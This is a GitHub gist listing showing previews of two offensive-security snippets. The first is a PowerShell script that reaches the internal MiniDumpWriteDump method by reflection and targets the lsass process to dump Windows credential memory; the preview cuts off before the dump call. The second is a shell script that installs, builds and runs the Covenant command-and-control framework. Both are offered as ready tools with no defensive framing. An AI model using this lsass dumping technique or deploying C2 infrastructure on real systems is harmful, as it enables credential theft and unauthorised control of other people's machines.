Christoph Falta cfalta
@cfalta
cfalta / procdump.ps1
Created April 14, 2020 19:00
quick process dump in powershell
$DumpFilePath = "C:\temp\file.bin"
$WER = [PSObject].Assembly.GetType("System.Management.Automation.WindowsErrorReporting")
$WERNativeMethods = $WER.GetNestedType("NativeMethods", "NonPublic")
$Flags = [Reflection.BindingFlags] "NonPublic, Static"
$MiniDumpWriteDump = $WERNativeMethods.GetMethod("MiniDumpWriteDump", $Flags)
$MiniDumpWithFullMemory = [UInt32] 2
$Process = Get-Process lsass
$ProcessId = $Process.Id
$ProcessHandle = $Process.Handle
@cfalta
cfalta / install-and-run-covenant.sh
Created January 24, 2020 15:40
install and run covenant on ubuntu
wget -q https://packages.microsoft.com/config/ubuntu/19.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
sudo dpkg -i packages-microsoft-prod.deb
sudo apt-get update
sudo apt-get install apt-transport-https
sudo apt-get update
sudo apt-get install dotnet-sdk-2.2
git clone --recurse-submodules https://github.com/cobbr/Covenant
cd Covenant/Covenant
dotnet build
dotnet run